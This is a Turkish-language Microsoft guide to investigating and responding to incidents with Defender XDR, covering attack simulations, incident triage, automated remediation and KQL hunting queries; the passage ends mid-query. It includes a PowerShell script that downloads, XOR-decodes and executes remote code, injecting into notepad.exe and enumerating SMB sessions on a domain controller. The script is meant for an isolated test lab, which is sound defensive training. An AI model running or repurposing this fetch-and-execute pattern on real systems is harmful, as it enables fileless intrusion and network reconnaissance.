Aracılığıyla paylaş


Microsoft Defender XDR kullanarak araştırma ve yanıtlama

Şunlar için geçerlidir:

  • Microsoft Defender XDR

Bu makalede, saldırı benzetimleri ve öğreticilerle olay oluşturma ve araştırmak ve yanıtlamak için Microsoft Defender XDR kullanma işlemi özetlenmiştir. Bu işleme başlamadan önce , Microsoft Defender XDR'yi pilot uygulama ve dağıtma işleminin genelini gözden geçirdiğinizden ve Microsoft Defender XDR'nin bazı bileşenlerinin pilot pilotunu oluşturduğunuzdan emin olun.

Microsoft Defender XDR'deki bir olay, bir saldırının hikayesini oluşturan bağıntılı uyarıların ve ilişkili verilerin bir koleksiyonudur. Microsoft 365 hizmetleri ve uygulamaları, şüpheli veya kötü amaçlı bir olay veya etkinlik algıladığında uyarılar oluşturur. Tek tek uyarılar, tamamlanmış veya devam eden bir saldırı hakkında değerli ipuçları sağlar. Ancak saldırılar genellikle cihazlar, kullanıcılar ve posta kutuları gibi farklı varlık türlerine karşı çeşitli teknikler uygular. Sonuç, kiracınızdaki birden çok varlık için birden çok uyarıdır.

Not

Güvenlik analizi ve olay yanıtı konusunda yeniyseniz tipik bir analiz, düzeltme ve olay sonrası gözden geçirme sürecine ilişkin kılavuzlu bir tura ulaşmak için İlk olay yanıtınıza yanıt verme kılavuzuna bakın.

Microsoft Defender XDR için uçtan uca dağıtım

Bu, olayları araştırmak ve yanıtlamak da dahil olmak üzere Microsoft Defender XDR bileşenlerini dağıtmanıza yardımcı olmak için serideki 6.maddedir.

Pilot ve Microsoft Defender XDR işleminde olay araştırmasını ve yanıtını gösteren diyagram.

Bu serideki makaleler, uçtan uca dağıtımın aşağıdaki aşamalarına karşılık gelir:

Aşama Bağlantı
C. Pilotu başlatın Pilotu başlatın
B. Microsoft Defender XDR bileşenlerini deneme ve dağıtma - Kimlik için Defender'ı pilot olarak kullanın ve dağıtın

- Office 365 için Defender'ı deneme ve dağıtma

- Uç Nokta için Defender'ı pilot olarak kullanma ve dağıtma

- Cloud Apps için Microsoft Defender'ı deneme ve dağıtma
C. Tehditleri araştırın ve karşı yanıt verin Olay araştırması ve yanıtı uygulama (bu makale)

Pilot ve dağıtımınız sırasında istediğiniz zaman Microsoft Defender XDR'nin olay yanıtını ve otomatik araştırma ve düzeltme özelliklerini test etmek için sanal saldırı ile bir olay oluşturabilir ve araştırmak ve yanıtlamak için Microsoft Defender portalını kullanabilirsiniz.

Microsoft Defender XDR kullanarak olay araştırması ve yanıtı için iş akışı

Üretim ortamınızda Microsoft Defender XDR kullanarak olayları araştırmak ve yanıtlamak için iş akışı aşağıdadır.

Olay araştırması ve yanıtı gerçekleştirme adımlarını gösteren diyagram.

Şu adımları izleyin:

  1. Microsoft Defender portalı ile saldırıların benzetimini yapın
  2. Olaylara öncelik belirleyin
  3. Olayları yönetin
  4. İşlem merkezi ile otomatik araştırmayı ve yanıtı inceleme
  5. Gelişmiş avcılığı kullanma

Adım 1. Microsoft Defender portalı ile saldırıların benzetimini yapın

Microsoft Defender portalı, pilot ortamınızda sanal saldırılar oluşturmak için yerleşik özelliklere sahiptir:

Office 365 için Defender saldırı simülasyonu eğitimi

Microsoft 365 E5 veya Office 365 Için Microsoft Defender Plan 2 ile Office 365 için Defender, kimlik avı saldırıları için saldırı benzetimi eğitimi içerir. Temel adımlar şunlardır:

  1. Simülasyon oluşturma

    Yeni simülasyon oluşturma ve başlatma hakkında adım adım yönergeler için bkz. Kimlik avı saldırısı simülasyonu.

  2. Yük oluşturma

    Simülasyonda kullanmak üzere yük oluşturma hakkında adım adım yönergeler için bkz. Saldırı simülasyonu eğitimi için özel yük oluşturma.

  3. İçgörü elde etme

    Raporlama ile içgörü elde etme hakkında adım adım yönergeler için bkz. Saldırı simülasyonu eğitimiyle içgörü elde etme.

Daha fazla bilgi için bkz . Simülasyonlar.

Uç Nokta için Defender saldırı öğreticileri & simülasyonları

Microsoft'un Uç Nokta için Defender simülasyonları şunlardır:

  • Belge arka kapı bırakıldığında
  • Otomatik araştırma (arka kapı)

Üçüncü taraf kaynaklardan ek simülasyonlar vardır. Ayrıca bir dizi öğretici de vardır.

Her simülasyon veya öğretici için:

  1. Sağlanan ilgili kılavuz belgeyi indirin ve okuyun.

  2. Simülasyon dosyasını indirin. Dosyayı veya betiği test cihazına indirmeyi seçebilirsiniz, ancak zorunlu değildir.

  3. Test cihazında simülasyon dosyasını veya betiği, kılavuz belgesinde açıklandığı gibi çalıştırın.

Daha fazla bilgi için bkz. Sanal saldırı aracılığıyla Uç Nokta için Microsoft Defender'ı deneyimleme.

Yalıtılmış etki alanı denetleyicisi ve istemci cihazıyla saldırı simülasyonu yapma (isteğe bağlı)

Bu isteğe bağlı olay yanıtı alıştırmasında, bir PowerShell betiği kullanarak yalıtılmış bir Active Directory Etki Alanı Hizmetleri (AD DS) etki alanı denetleyicisine ve Windows cihazına yönelik bir saldırının benzetimini yapacak ve ardından olayı araştıracak, düzeltip çözeceksiniz.

İlk olarak, pilot ortamınıza uç noktalar eklemeniz gerekir.

Pilot ortam uç noktaları ekleme

İlk olarak, pilot ortamınıza yalıtılmış bir AD DS etki alanı denetleyicisi ve bir Windows cihazı eklemeniz gerekir.

  1. Pilot ortam kiracınızın Microsoft Defender XDR'yı etkinleştirdiğini doğrulayın.

  2. Etki alanı denetleyicinizin:

  3. Test cihazınızın:

Kiracı ve cihaz grupları kullanıyorsanız test cihazı için ayrılmış bir cihaz grubu oluşturun ve en üst düzeye itin.

Alternatiflerden biri, AD DS etki alanı denetleyicinizi barındırmak ve cihazı Microsoft Azure altyapı hizmetlerinde sanal makine olarak test etmektir. Sanal kurumsal Test Laboratuvarı Kılavuzu'nun 1. Aşamasındaki yönergeleri kullanabilirsiniz, ancak APP1 sanal makinesinin oluşturulmasını atlayabilirsiniz.

Sonuç aşağıdadır.

Simülasyon kurumsal Test Laboratuvarı Kılavuzu'nu kullanarak değerlendirme ortamının diyagramı.

Algılamadan gizlemek için gelişmiş tekniklerden yararlanan gelişmiş bir saldırının benzetimini yapacaksınız. Saldırı, etki alanı denetleyicilerindeki açık Sunucu İleti Bloğu (SMB) oturumlarını numaralandırır ve kullanıcıların cihazlarının son IP adreslerini alır. Bu saldırı kategorisi genellikle kurbanın cihazına bırakılan dosyaları içermez ve bunlar yalnızca bellekte gerçekleşir. Mevcut sistem ve yönetim araçlarını kullanarak "arazide yaşarlar" ve yürütmelerini gizlemek için kodlarını sistem süreçlerine eklerler. Bu tür davranışlar, cihazda algılamadan kaçınmalarını ve kalıcı olmalarını sağlar.

Bu simülasyonda örnek senaryomuz bir PowerShell betiğiyle başlar. Gerçek dünyada, bir kullanıcı bir betiği çalıştırması için kandırılabilir veya betik, önceden virüs bulaşmış bir cihazdan başka bir bilgisayara uzak bir bağlantıdan çalıştırılabilir ve bu da saldırganın ağda yaya olarak hareket etmeye çalıştığını gösterir. Yöneticiler çeşitli yönetim etkinliklerini gerçekleştirmek için genellikle betikleri uzaktan çalıştırdığından bu betiklerin algılanması zor olabilir.

İşlem ekleme ve SMB keşif saldırısı ile Dosyasız PowerShell saldırısının ekran görüntüsü.

Simülasyon sırasında, saldırı kabuk kodunu görünüşte masum bir işleme ekler. Senaryo için notepad.exe kullanılması gerekir. Simülasyon için bu işlemi seçtik ancak saldırganlar büyük olasılıkla svchost.exe gibi uzun süre çalışan bir sistem işlemini hedeflemektedir. Ardından kabuk kodu, devam etme yönergelerini almak için saldırganın komut ve denetim (C2) sunucusuna başvurmaya devam eder. Betik, etki alanı denetleyicisinde (DC) keşif sorguları yürütmeye çalışır. Keşif, saldırganın son kullanıcı oturum açma bilgileri hakkında bilgi almasına olanak tanır. Saldırganlar bu bilgilere sahip olduktan sonra, belirli bir hassas hesaba ulaşmak için ağda yaya olarak hareket edebilir

Önemli

En iyi sonuçlar için saldırı simülasyonu yönergelerini mümkün olduğunca yakından izleyin.

Yalıtılmış AD DS etki alanı denetleyicisi saldırı benzetimi çalıştırma

Saldırı senaryosu simülasyonunu çalıştırmak için:

  1. Pilot ortamınızın yalıtılmış AD DS etki alanı denetleyicisini ve Windows cihazını içerdiğinden emin olun.

  2. Test kullanıcısı hesabıyla test cihazında oturum açın.

  3. Test cihazında bir Windows PowerShell penceresi açın.

  4. Aşağıdaki simülasyon betiğini kopyalayın:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
    $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
    $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
    $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
    

    Not

    Bu makaleyi bir web tarayıcısında açarsanız, belirli karakterleri kaybetmeden veya ek satır sonları eklemeden tam metni kopyalarken sorunlarla karşılaşabilirsiniz. Bu durumda, bu belgeyi indirin ve Adobe Reader'da açın.

  5. Kopyalanan betiği PowerShell penceresinde yapıştırın ve çalıştırın.

Not

PowerShell'i uzak masaüstü protokolü (RDP) kullanarak çalıştırıyorsanız , CTRL-V kısayol tuşu veya sağ tıklama-yapıştırma yöntemi çalışmayabileceği için RDP istemcisinde Pano Metni Yazın komutunu kullanın. PowerShell'in son sürümleri de bazen bu yöntemi kabul etmeyebilir; önce bellekte Not Defteri'ne kopyalamanız, sanal makineye kopyalamanız ve ardından PowerShell'e yapıştırmanız gerekebilir.

Birkaç saniye sonra Not Defteri uygulaması açılır. Not Defteri'ne sanal bir saldırı kodu eklenecektir. Senaryonun tamamını deneyimlemek için otomatik olarak oluşturulan Not Defteri örneğini açık tutun.

Sanal saldırı kodu bir dış IP adresiyle iletişim kurmaya (C2 sunucusu simülasyonu) ve ardından SMB aracılığıyla etki alanı denetleyicisine karşı keşif yapmaya çalışır.

Bu betik tamamlandığında PowerShell konsolunda bu iletiyi görürsünüz:

ran NetSessionEnum against [DC Name] with return code result 0

Otomatik Olay ve Yanıt özelliğinin çalıştığını görmek için notepad.exe işlemini açık tutun. Otomatik Olay ve Yanıt'ın Not Defteri işlemini durdurduğu görürsünüz.

Simülasyon saldırısı için olayı araştırma

Not

Bu simülasyonda size yol göstermeden önce, olay yönetiminin araştırma sürecinin bir parçası olarak ilgili uyarıları birlikte oluşturmanıza nasıl yardımcı olduğunu, portalda nerede bulabileceğinizi ve güvenlik işlemlerinizde size nasıl yardımcı olabileceğini görmek için aşağıdaki videoyu izleyin:

SOC analisti bakış açısına geçtiğinizde artık Microsoft Defender portalında saldırıyı araştırmaya başlayabilirsiniz.

  1. Microsoft Defender portalını açın.

  2. Gezinti bölmesinde Olaylar & Uyarılar Olayları'nı >seçin.

  3. Simülasyon saldırısı için yeni olay, olay kuyruğunda görünür.

    Olaylar kuyruğu örneğinin ekran görüntüsü.

Saldırıyı tek bir olay olarak araştırma

Microsoft Defender XDR, analizi ilişkilendirerek farklı ürünlerdeki tüm ilgili uyarıları ve araştırmaları tek bir olay varlığında toplar. Bunu yaparak Microsoft Defender XDR, SOC analistinin karmaşık tehditleri anlamasına ve yanıtlamasına olanak sağlayan daha geniş bir saldırı hikayesi gösterir.

Bu simülasyon sırasında oluşturulan uyarılar aynı tehditle ilişkilendirilir ve sonuç olarak otomatik olarak tek bir olay olarak toplanır.

Olayı görüntülemek için:

  1. Microsoft Defender portalını açın.

  2. Gezinti bölmesinde Olaylar & Uyarılar Olayları'nı >seçin.

  3. Olay adının solundaki daireye tıklayarak en yeni öğeyi seçin. Yan panel, ilgili tüm uyarılar da dahil olmak üzere olay hakkında ek bilgiler görüntüler. Her olayın, içerdiği uyarıların özniteliklerine göre bunu açıklayan benzersiz bir adı vardır.

    Panoda gösterilen uyarılar hizmet kaynaklarına göre filtrelenebilir: Kimlik için Microsoft Defender, Cloud Apps için Microsoft Defender, Uç Nokta için Microsoft Defender, Microsoft Defender XDR ve Office 365 için Microsoft Defender.

  4. Olay hakkında daha fazla bilgi edinmek için Olay sayfasını aç'ı seçin.

    Olay sayfasında, olayla ilgili tüm uyarıları ve bilgileri görebilirsiniz. Bilgiler uyarıya katılan varlıkları ve varlıkları, uyarıların algılama kaynağını (Kimlik için Microsoft Defender veya Uç Nokta için Microsoft Defender gibi) ve bunların birbirine bağlanma nedenini içerir. Olay uyarısı listesini gözden geçirmek, saldırının ilerleme durumunu gösterir. Bu görünümden tek tek uyarıları görebilir ve araştırabilirsiniz.

    Ayrıca sağ taraftaki menüden Olayı yönet'e tıklayarak olayı etiketleyebilir, kendinize atayabilir ve açıklama ekleyebilirsiniz.

Oluşturulan uyarıları gözden geçirme

Şimdi simülasyon saldırısı sırasında oluşturulan uyarılardan bazılarına göz atalım.

Not

Simülasyon saldırısı sırasında oluşturulan uyarılardan yalnızca birkaçını inceleyeceğiz. Test cihazınızda çalışan Windows sürümüne ve Microsoft Defender XDR ürünlerine bağlı olarak, biraz farklı bir sırada görünen daha fazla uyarı görebilirsiniz.

Oluşturulan uyarı örneğinin ekran görüntüsü.

Uyarı: Şüpheli işlem ekleme gözlemlendi (Kaynak: Uç Nokta için Microsoft Defender)

Gelişmiş saldırganlar bellekte kalıcı hale getirmek ve algılama araçlarından gizlemek için gelişmiş ve gizli yöntemler kullanır. Yaygın tekniklerden biri, kötü amaçlı yürütülebilir dosya yerine güvenilir bir sistem işlemi içinde çalışmaktır ve bu da algılama araçlarının ve güvenlik işlemlerinin kötü amaçlı kodu tespit etmelerini zorlaştırmaktır.

SOC analistlerinin bu gelişmiş saldırıları yakalamasına izin vermek için Uç Nokta için Microsoft Defender'daki derin bellek algılayıcıları bulut hizmetimize çeşitli işlemler arası kod ekleme teknikleri hakkında daha önce görülmemiş görünürlük sağlar. Aşağıdaki şekilde, Uç Nokta için Defender'ın notepad.exekod ekleme girişiminde nasıl algılandığı ve uyarılandığı gösterilmektedir.

Kötü amaçlı olabilecek bir kod eklemeye yönelik uyarı örneğinin ekran görüntüsü.

Uyarı: Komut satırı bağımsız değişkeni olmayan bir işlem çalıştırması tarafından gözlemlenen beklenmeyen davranış (Kaynak: Uç Nokta için Microsoft Defender)

Uç Nokta için Microsoft Defender algılamaları genellikle bir saldırı tekniğinin en yaygın özniteliğini hedefler. Bu yöntem dayanıklılık sağlar ve saldırganların daha yeni taktiklere geçiş yapma çıtasını yükseltir.

Kuruluş içinde ve dünya çapında ortak süreçlerin normal davranışını oluşturmak ve bu işlemlerin anormal davranışları ne zaman gösterdiğini izlemek için büyük ölçekli öğrenme algoritmaları kullanırız. Bu anormal davranışlar genellikle fazladan kod sunulduğunu ve başka bir şekilde güvenilen bir işlemde çalıştığını gösterir.

Bu senaryo için ,notepad.exe işlem, dış konumla iletişim içeren anormal davranışlar sergiliyor. Bu sonuç, kötü amaçlı kodu tanıtmak ve yürütmek için kullanılan belirli yöntemden bağımsızdır.

Not

Bu uyarı, ek arka uç işlemesi gerektiren makine öğrenmesi modellerini temel alındığından, bu uyarıyı portalda görmeniz biraz zaman alabilir.

Uyarı ayrıntılarında dış IP adresinin (araştırmayı genişletmek için özet olarak kullanabileceğiniz bir gösterge) olduğuna dikkat edin.

IP adresi ayrıntıları sayfasını görüntülemek için uyarı işlem ağacında IP adresini seçin.

Komut satırı bağımsız değişkenleri olmayan bir işlem çalıştırması tarafından beklenmeyen davranış örneği ekran görüntüsü.

Aşağıdaki şekilde seçili IP Adresi ayrıntıları sayfası görüntülenir (Uyarı işlem ağacında IP adresine tıklanması).

IP adresi ayrıntıları sayfasının bir örneğinin ekran görüntüsü.

Uyarı: Kullanıcı ve IP adresi keşfi (SMB) (Kaynak: Kimlik için Microsoft Defender)

Sunucu İleti Bloğu (SMB) protokolü kullanılarak numaralandırma, saldırganların belirli bir hassas hesaba erişmek için ağ üzerinden daha sonra hareket etmelerine yardımcı olan son kullanıcı oturum açma bilgilerini almalarına olanak tanır.

Bu algılamada, SMB oturum numaralandırması bir etki alanı denetleyicisinde çalıştırıldığında bir uyarı tetikleniyor.

Kullanıcı ve IP adresi keşfi için Kimlik için Microsoft Defender uyarısı örneğinin ekran görüntüsü.

Uç Nokta için Microsoft Defender ile cihaz zaman çizelgesini gözden geçirin

Bu olaydaki çeşitli uyarıları inceledikten sonra daha önce araştırdığınız olay sayfasına geri dönün. Uç Nokta için Microsoft Defender ve Kimlik için Microsoft Defender tarafından bildirilen bu olaya dahil olan cihazları gözden geçirmek için olay sayfasındaki Cihazlar sekmesini seçin.

Saldırının gerçekleştirildiği cihazın adını seçerek ilgili cihazın varlık sayfasını açın. Bu sayfada, tetiklenen uyarıları ve ilgili olayları görebilirsiniz.

Zaman Çizelgesi sekmesini seçerek cihaz zaman çizelgesini açın ve cihazda gözlemlenen tüm olayları ve davranışları, tetiklenen uyarılarla birlikte kronolojik sırada görüntüleyin.

Davranışlar içeren cihaz zaman çizelgesi örneğinin ekran görüntüsü.

Daha ilginç davranışlardan bazılarını genişletmek, işlem ağaçları gibi yararlı ayrıntılar sağlar.

Örneğin, şüpheli işlem eklemenin gözlemlendiği uyarı olayını bulana kadar aşağı kaydırın. Yan bölmedeki Olay varlıkları grafiğinin altında bu davranışa yönelik tam işlem ağacını görüntülemek için altındaki notepad.exe işlem olayına eklenenpowershell.exe seçin. Gerekirse filtreleme için arama çubuğunu kullanın.

Seçili PowerShell dosya oluşturma davranışı için işlem ağacı örneğinin ekran görüntüsü.

Cloud Apps için Microsoft Defender ile kullanıcı bilgilerini gözden geçirme

Saldırıyla ilgili kullanıcıların listesini görüntülemek için olay sayfasında Kullanıcılar sekmesini seçin. Tablo, her kullanıcının Araştırma Önceliği puanı dahil olmak üzere her kullanıcı hakkında ek bilgiler içerir.

Daha fazla araştırmanın yürütülebileceği kullanıcının profil sayfasını açmak için kullanıcı adını seçin. Riskli kullanıcıları araştırma hakkında daha fazla bilgi edinin.

Cloud Apps için Defender kullanıcı sayfasının ekran görüntüsü.

Otomatik araştırma ve düzeltme

Not

Bu simülasyonda size yol göstermeden önce otomatik kendi kendini düzeltmenin ne olduğunu, portalda nerede bulabileceğinizi ve güvenlik işlemlerinizde nasıl yardımcı olabileceğini öğrenmek için aşağıdaki videoyu izleyin:

Microsoft Defender portalında olaya geri dönün. Olay sayfasındaki Araştırma sekmesi, Kimlik için Microsoft Defender ve Uç Nokta için Microsoft Defender tarafından tetiklenen otomatik araştırmaları gösterir. Aşağıdaki ekran görüntüsünde yalnızca Uç Nokta için Defender tarafından tetiklenen otomatik araştırma gösterilir. Varsayılan olarak, Uç Nokta için Defender kuyrukta bulunan yapıtları otomatik olarak düzelterek düzeltme gerektirir.

Olayla ilgili otomatik araştırmalara ilişkin bir örneğin ekran görüntüsü.

Araştırma ayrıntıları sayfasını açmak için araştırmayı tetikleyen uyarıyı seçin. Aşağıdaki ayrıntıları görürsünüz:

  • Otomatik araştırmayı tetikleyen uyarılar.
  • Etkilenen kullanıcılar ve cihazlar. Göstergeler ek cihazlarda bulunursa, bu ek cihazlar da listelenir.
  • Kanıt listesi. Dosyalar, işlemler, hizmetler, sürücüler ve ağ adresleri gibi bulunan ve analiz edilen varlıklar. Bu varlıklar, uyarıyla olası ilişkiler için analiz edilir ve zararsız veya kötü amaçlı olarak derecelendirilir.
  • Tehditler bulundu. Araştırma sırasında bulunan bilinen tehditler.

Not

Zamanlamaya bağlı olarak otomatik araştırma hala çalışıyor olabilir. Kanıtı toplayıp analiz edip sonuçları gözden geçirmeden önce işlemin tamamlanması için birkaç dakika bekleyin. En son bulguları almak için Araştırma ayrıntıları sayfasını yenileyin.

Araştırma ayrıntıları sayfasının bir örneğinin ekran görüntüsü.

Otomatik araştırma sırasında Uç Nokta için Microsoft Defender, düzeltme gerektiren yapıtlardan biri olarak eklenen notepad.exe işlemini tanımladı. Uç Nokta için Defender, otomatik düzeltmenin bir parçası olarak şüpheli işlem ekleme işlemini otomatik olarak durdurur.

Test cihazında çalışan işlemler listesinden notepad.exe kaybolduğunu görebilirsiniz.

Olayı çözme

Araştırma tamamlandıktan ve düzeltilmesi onaylandıktan sonra olayı çözersiniz.

Olay sayfasında Olayıyönet'i seçin. Durumu Olayı çöz olarak ayarlayın ve sınıflandırma için Doğru uyarı ve belirleme için Güvenlik testi'ni seçin.

Olayı çözmek için anahtara tıklayabileceğiniz Olay yönet panelinin açık olduğu olaylar sayfasının bir örneğinin ekran görüntüsü.

Olay çözümlendiğinde, Microsoft Defender portalında ve ilgili portallarda ilişkili tüm uyarıları çözümler.

Bu, olay analizi, otomatik araştırma ve olay çözümleme için saldırı simülasyonlarını tamamlar.

Adım 2. Olaylara öncelik belirleyin

Microsoft Defender portalının hızlı başlatılması sırasında Olaylar & uyarılar > Olaylar bölümünden olay kuyruğuna ulaşabilirsiniz. İşte bir örnek.

Microsoft Defender portalındaki Olaylar & uyarıları bölümünün ekran görüntüsü.

En son olaylar ve uyarılar bölümü, alınan uyarı sayısının ve son 24 saat içinde oluşturulan olayların grafiğini gösterir.

Olayların listesini incelemek ve bunların atama ve araştırma açısından önemini önceliklendirmek için şunları yapabilirsiniz:

  • Olayın veya etkilenen varlıkların farklı özelliklerine görünürlük sağlamak için özelleştirilebilir sütunları yapılandırın ( Sütunları seç'i seçin). Bu, analiz için olayların önceliklendirilmesiyle ilgili bilinçli bir karar vermenize yardımcı olur.

  • Belirli bir senaryoya veya tehdide odaklanmak için filtrelemeyi kullanın. Olay kuyruğuna filtre uygulamak, hangi olayların hemen ilgilenilmesi gerektiğini belirlemeye yardımcı olabilir.

Varsayılan olay kuyruğundan Filtreler'i seçerek belirli bir olay kümesini belirtebileceğiniz filtreler bölmesini görebilirsiniz. İşte bir örnek.

Microsoft Defender portalındaki Olaylar & uyarıları bölümünün Filtreler bölmesinin ekran görüntüsü.

Daha fazla bilgi için bkz. Olayları önceliklendirme.

Adım 3. Olayları yönetin

Olayları bir olayın Olay yönetme bölmesinden yönetebilirsiniz. İşte bir örnek.

Microsoft Defender portalındaki Olaylar & uyarıları bölümünün Olay yönet bölmesinin ekran görüntüsü.

Bu bölmeyi aşağıdaki olay yönet bağlantısından görüntüleyebilirsiniz:

  • Olay kuyruğundaki bir olayın Özellikler bölmesi.
  • Bir olayın özet sayfası.

Olaylarınızı yönetmek için kullanabileceğiniz yöntemler şunlardır:

  • Olay adını düzenleme

    Güvenlik ekibinizin en iyi yöntemlerine göre otomatik olarak atanan adı değiştirin.

  • Olay etiketleri ekleme

    Güvenlik ekibinizin olayları sınıflandırmak için kullandığı ve daha sonra filtrelenebilen etiketler ekleyin.

  • Olayı atama

    Daha sonra filtrelenebilen bir kullanıcı hesabı adına atayın.

  • Bir olayı çözme

    Düzeltildikten sonra olayı kapatın.

  • Sınıflandırmasını ve belirlenmesini ayarlama

    Bir olayı çözümlerken tehdit türünü sınıflandırın ve seçin.

  • Açıklama ekleme

    Güvenlik ekibinizin en iyi yöntemlerini temel alan ilerleme durumu, notlar veya diğer bilgiler için açıklamaları kullanın. Açıklama geçmişinin tamamı, bir olayın ayrıntılar sayfasındaki Açıklamalar ve geçmiş seçeneğinden kullanılabilir.

Daha fazla bilgi için bkz. Olayları yönetme.

Adım 4. İşlem merkezi ile otomatik araştırmayı ve yanıtı inceleme

Kuruluşunuz için otomatik araştırma ve yanıt özelliklerinin nasıl yapılandırıldığına bağlı olarak, düzeltme eylemleri otomatik olarak veya yalnızca güvenlik operasyonları ekibinizin onayıyla gerçekleştirilen işlemlerdir. Bekleyen veya tamamlanan tüm eylemler, cihazlarınız, e-posta & işbirliği içeriği ve kimlikleri tek bir konumda bekleyen ve tamamlanan düzeltme eylemlerini listeleyen İşlem merkezinde listelenir.

İşte bir örnek.

Microsoft Defender portalındaki Birleşik İşlem merkezi ekran görüntüsü.

İşlem merkezinden bekleyen eylemleri seçebilir ve ardından açılır bölmede bunları onaylayabilir veya reddedebilirsiniz. İşte bir örnek.

Microsoft Defender portalında bir eylemi onaylama veya reddetme seçeneklerini gösteren bölmenin ekran görüntüsü.

Otomatik araştırmalarınızın zamanında devam edebilmesi ve tamamlayabilmesi için bekleyen eylemleri en kısa sürede onaylayın (veya reddedin).

Daha fazla bilgi için bkz . Otomatik araştırma ve yanıt veİşlem merkezi.

Adım 5. Gelişmiş avcılığı kullanma

Not

Gelişmiş tehdit avcılığı simülasyonunda size yol gösterirken, gelişmiş avlanma kavramlarını anlamak, portalda nerede bulabileceğinizi görmek ve güvenlik operasyonlarınızda size nasıl yardımcı olabileceğini öğrenmek için aşağıdaki videoyu izleyin.


İsteğe bağlı dosyasız PowerShell saldırı benzetimi kimlik bilgisi erişim aşamasına ulaşmış gerçek bir saldırıysa, oluşturulan uyarılardan ve etkilenen varlıklardan zaten bildiklerinizi kullanarak ağdaki olayları ve kayıtları proaktif olarak aramak için araştırmanın herhangi bir noktasında gelişmiş avcılığı kullanabilirsiniz.

Örneğin, Kullanıcı ve IP adresi keşfi (SMB) uyarısında yer alan bilgilere bağlı olarak, tabloyu kullanarak IdentityDirectoryEvents tüm SMB oturum numaralandırma olaylarını bulabilir veya tabloyu kullanarak IdentityQueryEvents Kimlik için Microsoft Defender'daki diğer çeşitli protokollerde daha fazla bulma etkinliği bulabilirsiniz.

Avlanma ortamı gereksinimleri

Bu benzetim için tek bir iç posta kutusu ve cihaz gereklidir. Test iletisini göndermek için bir dış e-posta hesabına da ihtiyacınız olacaktır.

  1. Kiracınızın Microsoft Defender XDR'yı etkinleştirdiğini doğrulayın.

  2. E-posta almak için kullanılacak hedef posta kutusunu belirleyin.

    • Bu posta kutusu Office 365 için Microsoft Defender tarafından izlenmelidir

    • Gereksinim 3'ten gelen cihazın bu posta kutusuna erişmesi gerekiyor

  3. Test cihazını yapılandırma:

    a. Windows 10 sürüm 1903 veya sonraki bir sürümü kullandığınızdan emin olun.

    b. Test cihazını test etki alanına ekleyin.

    c. Microsoft Defender Virüsten Koruma'nı açın. Microsoft Defender Virüsten Koruma'yı etkinleştirme konusunda sorun yaşıyorsanız bu sorun giderme konusuna bakın.

    d. Uç Nokta için Microsoft Defender'a ekleme.

Simülasyonu çalıştırma

  1. Dış e-posta hesabından, tehdit avcılığı ortamı gereksinimleri bölümünün 2. adımında tanımlanan posta kutusuna bir e-posta gönderin. Mevcut e-posta filtresi ilkeleri aracılığıyla izin verilecek bir ek ekleyin. Bu dosyanın kötü amaçlı veya yürütülebilir olması gerekmez. Önerilen dosya türleri .pdf, .exe (izin veriliyorsa) veya Word dosyası gibi bir Office belge türüdür.

  2. Tehdit avcılığı ortamı gereksinimleri bölümünün 3. adımında tanımlandığı şekilde yapılandırılan cihazdan gönderilen e-postayı açın. Eki açın veya dosyayı cihaza kaydedin.

Avlanmaya git

  1. Microsoft Defender portalını açın.

  2. Gezinti bölmesinden Tehdit Avcılığı Gelişmiş avcılığı'nı >seçin.

  3. E-posta olaylarını toplayarak başlayan bir sorgu oluşturun.

    1. Sorgu > Yeni'yi seçin.

    2. Gelişmiş avcılık altındaki E-posta gruplarında EmailEvents'e çift tıklayın. Bunu sorgu penceresinde görmeniz gerekir.

      EmailEvents
      
    3. Sorgunun zaman çerçevesini son 24 saat olarak değiştirin. Yukarıdaki simülasyonu çalıştırdığınızda gönderdiğiniz e-postanın son 24 saat içinde olduğunu varsayarsak, aksi takdirde zaman dilimini gerektiği gibi değiştirin.

    4. Sorguyu çalıştır'ı seçin. Pilot ortamınıza bağlı olarak farklı sonuçlar elde edebilirsiniz.

      Not

      Veri dönüşünü sınırlamak için filtreleme seçenekleri için sonraki adıma bakın.

      Microsoft Defender portalındaki Gelişmiş Avcılık sayfasının ekran görüntüsü.

      Not

      Gelişmiş tehdit avcılığı sorgu sonuçlarını tablo verileri olarak görüntüler. Ayrıca, verileri grafikler gibi diğer biçim türlerinde de görüntülemeyi tercih edebilirsiniz.

    5. Sonuçlara bakın ve açtığınız e-postayı tanımlayıp tanımlayabildiğinize bakın. İletinin gelişmiş avcılıkta görünmesi iki saat kadar sürebilir. Sonuçları daraltmak için sorgunuza where koşulunu ekleyerek yalnızca SenderMailFromDomain olarak "yahoo.com" olan e-postaları arayabilirsiniz. İşte bir örnek.

      EmailEvents
      | where SenderMailFromDomain == "yahoo.com"
      
    6. Kaydı inceleyebilmeniz için sorgudan elde edilen satırlara tıklayın.

      Microsoft Defender portalındaki Gelişmiş Tehdit Avcılığı sayfasının Kaydı incele bölümünün ekran görüntüsü.

  4. Artık e-postayı görebildiğinizi doğruladığınıza göre ekler için bir filtre ekleyin. Ortamda ekleri olan tüm e-postalara odaklanın. Bu simülasyon için, ortamınızdan gönderilen e-postalara değil, gelen e-postalara odaklanın. İletinizi bulmak için eklediğiniz filtreleri kaldırın ve "| where AttachmentCount > 0 ve EmailDirection == "Inbound""

    Aşağıdaki sorgu, tüm e-posta olayları için ilk sorgunuzdan daha kısa bir liste içeren sonucu gösterir:

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    
  5. Ardından, sonuç kümenize ek hakkındaki bilgileri (örneğin: dosya adı, karmalar) ekleyin. Bunu yapmak için EmailAttachmentInfo tablosuna katılın. Bu örnekte, birleştirme için kullanılacak ortak alanlar NetworkMessageId ve RecipientObjectId'dir.

    Aşağıdaki sorgu ayrıca ek bir satır da içerir"| project-rename EmailTimestamp=Timestamp", bir sonraki adımda ekleyeceğiniz dosya eylemleriyle ilgili zaman damgaları yerine e-postayla hangi zaman damgasının ilişkili olduğunu belirlemenize yardımcı olur.

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
